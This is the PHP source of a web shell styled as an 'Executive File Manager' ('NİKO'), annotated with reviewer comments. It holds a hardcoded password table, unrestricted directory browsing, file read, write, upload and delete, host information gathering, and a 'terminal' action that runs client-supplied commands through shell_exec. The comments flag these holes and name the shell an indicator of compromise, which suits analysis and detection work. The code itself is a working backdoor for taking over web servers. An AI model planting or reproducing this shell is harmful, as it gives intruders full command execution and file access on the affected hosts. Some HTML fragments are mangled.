VULN_CHECK_0COQYT '4695', 'admin' => '46597', 'executive' => 'admin4695' ]; $current_user = $_SESSION['user'] ?? null; if (!isset($_SESSION['authenticated'])) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['username'], $_POST['password'])) { $username = $_POST['username']; $password = $_POST['password']; if (isset($users[$username]) && $users[$username] === $password) { $_SESSION['authenticated'] = true; $_SESSION['user'] = $username; $_SESSION['login_time'] = time(); header('Location: ' . $_SERVER['PHP_SELF']); exit; } else { $error = 'Access Denied'; } } // NİKO Login Interface echo ' NİKO File Manager
NİKO Avatar
Executive File Management
Where Wealth Meets Technology
▣ Secure Executive Access Portal ▣
🔐 Authorized Personnel Only - Executive Access Required
'; if (isset($error)) { echo '
⚠ ' . htmlspecialchars($error) . ' ⚠
'; } echo '
'; exit; }
// End of the unauthenticated branch: the login form has been printed and the
// script has exited, so everything below runs only when
// $_SESSION['authenticated'] is set. The gate above compares the submitted
// password with === against a credential table stored in this file.

// Logout
// NOTE(review): triggered by a bare GET parameter; no anti-CSRF token is checked.
if (isset($_GET['logout'])) {
    session_destroy();
    header('Location: ' . $_SERVER['PHP_SELF']);
    exit;
}

// Helper functions

/**
 * HTML-escape a value for output (both quote styles, UTF-8).
 */
function safe($str) {
    return htmlspecialchars($str, ENT_QUOTES, 'UTF-8');
}

/**
 * Render a byte count as a human-readable string with two decimals.
 *
 * Returns '0 B' for zero or negative input. The unit is chosen from the
 * base-1024 logarithm of $size.
 */
function formatBytes($size) {
    if ($size <= 0) return '0 B';
    $units = ['B', 'KB', 'MB', 'GB', 'TB', 'PB'];
    // floor() returns a float; it is used directly as the array index below.
    $pow = floor(log($size) / log(1024));
    // NOTE(review): $pow is not clamped to the last unit, so a size of
    // 1024^6 bytes or more would index past 'PB'.
    return number_format($size / pow(1024, $pow), 2) . ' ' . $units[$pow];
}

/**
 * Pick a display icon for a file name from its lower-cased extension.
 *
 * Unknown or missing extensions fall back to the generic document icon.
 */
function getFileIcon($filename) {
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    $icons = [
        'php' => '⚡', 'html' => '🌐', 'css' => '🎨', 'js' => '📜', 'json' => '📋',
        'txt' => '📄', 'md' => '📝', 'pdf' => '📕', 'doc' => '📘', 'docx' => '📘',
        'jpg' => '🖼️', 'jpeg' => '🖼️', 'png' => '🖼️', 'gif' => '🖼️', 'svg' => '🎯',
        'mp3' => '🎵', 'wav' => '🎵', 'mp4' => '🎬', 'avi' => '🎬', 'mov' => '🎬',
        'zip' => '📦', 'rar' => '📦', '7z' => '📦', 'tar' => '📦', 'gz' => '📦',
        'sql' => '🗃️', 'db' => '🗃️', 'sqlite' => '🗃️', 'xml' => '🔖',
        'ini' => '⚙️', 'log' => '📊', 'tmp' => '🗂️', 'bak' => '💾',
        'conf' => '🔧', 'cfg' => '🔧'
    ];
    return $icons[$ext] ?? '📄';
}

// Current directory
// NOTE(review): the working directory comes straight from the query string.
// realpath() canonicalises it and is_readable() is the only check; nothing
// confines it to a base directory, so every handler below operates on
// whichever readable directory the request names. Falls back to getcwd()
// when realpath() fails (false) or the directory is unreadable.
$current_dir = isset($_GET['dir']) ? realpath($_GET['dir']) : getcwd();
if (!$current_dir || !is_readable($current_dir)) {
    $current_dir = getcwd();
}

// Handle file download
// basename() strips directory components from the requested name, so the file
// must sit directly inside $current_dir -- but $current_dir is itself
// request-controlled (see above), so this does not limit which files can be
// fetched. The file is streamed as an attachment and the script stops.
if (isset($_GET['download'])) {
    $file = $current_dir . '/' . basename($_GET['download']);
    if (file_exists($file) && is_file($file)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        // NOTE(review): the file name is placed inside the quoted header value
        // without escaping any '"' it may contain.
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        header('Content-Length: ' . filesize($file));
        header('Cache-Control: must-revalidate');
        header('Pragma: public');
        readfile($file);
        exit;
    }
}

// Handle AJAX requests
// Every action answers with JSON and exits. NOTE(review): none of the handlers
// checks an anti-CSRF token or the identity of the logged-in user; any
// authenticated session can invoke every action. All target paths are built as
// $current_dir . '/' . basename(<client value>).
if (isset($_POST['action'])) {
    header('Content-Type: application/json');
    switch ($_POST['action']) {
        // Return the raw contents of a readable file.
        case 'edit_file':
            $file = $current_dir . '/' . basename($_POST['file']);
            if (file_exists($file) && is_readable($file)) {
                $content = file_get_contents($file);
                echo json_encode(['success' => true, 'content' => $content]);
            } else {
                echo json_encode(['success' => false, 'error' => 'File access denied']);
            }
            exit;

        // Write client-supplied content to a file, creating or overwriting it.
        // NOTE(review): no restriction on file type or name, so server-side
        // script files can be written or replaced.
        case 'save_file':
            $file = $current_dir . '/' . basename($_POST['file']);
            $content = $_POST['content'];
            if (file_put_contents($file, $content) !== false) {
                echo json_encode(['success' => true]);
            } else {
                echo json_encode(['success' => false, 'error' => 'Save operation failed']);
            }
            exit;

        // Remove a file or a directory; '@' hides the PHP warning on failure and
        // only the boolean result is reported. rmdir() succeeds only on empty
        // directories.
        case 'delete':
            $target = $current_dir . '/' . basename($_POST['target']);
            if (is_dir($target)) {
                $success = @rmdir($target);
            } else {
                $success = @unlink($target);
            }
            echo json_encode(['success' => $success]);
            exit;

        // Rename within the current directory (both names pass through basename()).
        case 'rename':
            $oldName = $current_dir . '/' . basename($_POST['old_name']);
            $newName = $current_dir . '/' . basename($_POST['new_name']);
            $success = @rename($oldName, $newName);
            echo json_encode(['success' => $success]);
            exit;

        // Create an empty file; an existing file of that name is truncated.
        case 'create_file':
            $file = $current_dir . '/' . basename($_POST['filename']);
            $success = @file_put_contents($file, '') !== false;
            echo json_encode(['success' => $success]);
            exit;

        // Create a directory with mode 0755.
        case 'create_folder':
            $folder = $current_dir . '/' . basename($_POST['folder_name']);
            $success = @mkdir($folder, 0755);
            echo json_encode(['success' => $success]);
            exit;

        // Store uploaded file(s) under their client-supplied names.
        // NOTE(review): no check on extension, content type or size, and an
        // existing file of the same name is overwritten. When no 'files' field
        // is present the handler exits with an empty body.
        case 'upload':
            if (isset($_FILES['files'])) {
                $files = $_FILES['files'];
                $uploaded = 0;
                // 'name' is an array for multi-file uploads, a string otherwise.
                $total = is_array($files['name']) ? count($files['name']) : 1;
                if (is_array($files['name'])) {
                    for ($i = 0; $i < $total; $i++) {
                        if ($files['error'][$i] === UPLOAD_ERR_OK) {
                            $target = $current_dir . '/' . basename($files['name'][$i]);
                            if (move_uploaded_file($files['tmp_name'][$i], $target)) {
                                $uploaded++;
                            }
                        }
                    }
                } else {
                    // Single-file branch: the upload error code is not inspected
                    // here; move_uploaded_file() is the only check.
                    $target = $current_dir . '/' . basename($files['name']);
                    if (move_uploaded_file($files['tmp_name'], $target)) {
                        $uploaded = 1;
                    }
                }
                echo json_encode(['success' => $uploaded > 0, 'uploaded' => $uploaded, 'total' => $total]);
            }
            exit;

        // Run a client-supplied command line on the host.
        // NOTE(review): only the directory argument is escaped; the 'command'
        // value is concatenated into the shell string unmodified, so this is
        // arbitrary command execution with the web server's privileges. This
        // handler is what makes the script a web shell rather than a file
        // manager; its presence in a web root is an indicator of compromise.
        case 'terminal':
            $command = trim($_POST['command'] ?? '');
            if (empty($command)) {
                echo json_encode(['success' => false, 'error' => 'No command provided']);
                exit;
            }
            $output = '';
            try {
                if (function_exists('shell_exec')) {
                    // stderr is merged into stdout so errors reach the caller.
                    $full_command = "cd " . escapeshellarg($current_dir) . " && " . $command . " 2>&1";
                    $output = shell_exec($full_command);
                } else {
                    $output = 'Shell execution not available on this system';
                }
            } catch (Exception $e) {
                // presumably rarely reached: shell_exec() signals failure through
                // its return value -- confirm.
                $output = 'Execution error: ' . $e->getMessage();
            }
            // 'success' is reported as true regardless of what the command did;
            // empty/null output is replaced by a fixed message.
            echo json_encode(['success' => true, 'output' => $output ?: 'Command executed with no output']);
            exit;
    }
}

// Get files
// '@' hides the warning when the directory cannot be listed; an empty list is
// used in that case.
$files = @scandir($current_dir);
if (!$files) $files = [];

// Sort files (directories first, then alphabetically)
// The comparison is case-insensitive. '.' and '..' compare as equal to every
// other entry (return 0), so their final position is left to the sort.
usort($files, function($a, $b) use ($current_dir) {
    if ($a === '.' || $a === '..' || $b === '.' || $b === '..') return 0;
    $a_is_dir = is_dir($current_dir . '/' . $a);
    $b_is_dir = is_dir($current_dir . '/' . $b);
    if ($a_is_dir && !$b_is_dir) return -1;
    if (!$a_is_dir && $b_is_dir) return 1;
    return strcasecmp($a, $b);
});

// Get system information
// Host details gathered for the dashboard: PHP version, OS, server software,
// memory limit, script owner, disk usage of the current directory. Where these
// values are rendered is not visible in this part of the file.
$system_info = [
    'php' => PHP_VERSION,
    'os' => PHP_OS,
    'server' => $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown',
    'memory' => ini_get('memory_limit'),
    // get_current_user() reports the owner of this script file, not the user
    // the PHP process runs as.
    'user' => get_current_user(),
    'disk_free' => formatBytes(disk_free_space($current_dir)),
    'disk_total' => formatBytes(disk_total_space($current_dir)),
    'current_dir' => $current_dir,
    // Exclude . and .. -- NOTE(review): yields -2 when scandir() failed and
    // $files was reset to an empty array.
    'file_count' => count($files) - 2,
    // Seconds since login, from the timestamp stored in the session at login.
    'session_time' => isset($_SESSION['login_time']) ? time() - $_SESSION['login_time'] : 0
];

// Display title for the logged-in user ($current_user was read from
// $_SESSION['user'] at the top of the script); unknown names get 'Executive'.
$user_titles = [
    'NİKO' => 'Chairman & CEO',
    'admin' => 'System Administrator',
    'executive' => 'Chief Executive Officer'
];
$user_title = $user_titles[$current_user] ?? 'Executive';
?> NİKO File Manager - Executive Dashboard
Executive File Management System
Files
Free Space
Session
Logout
'; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; } // Files and directories foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $filepath = $current_dir . '/' . $file; if (!is_readable($filepath)) continue; $is_dir = is_dir($filepath); $size = $is_dir ? 'DIR' : formatBytes(filesize($filepath)); $modified = date('M d, Y H:i', filemtime($filepath)); $perms = substr(sprintf('%o', fileperms($filepath)), -4); echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; } ?>
Name Size Modified Perms Actions
📁 ..----
'; if ($is_dir) { echo ' 📁 ' . safe($file) . ''; } else { $icon = getFileIcon($file); echo ' ' . $icon . ' ' . safe($file) . ''; } echo '' . $size . '' . $modified . '' . $perms . '
'; if (!$is_dir) { echo ' Edit'; echo ' Download'; } echo ' Rename'; echo ' Delete'; echo '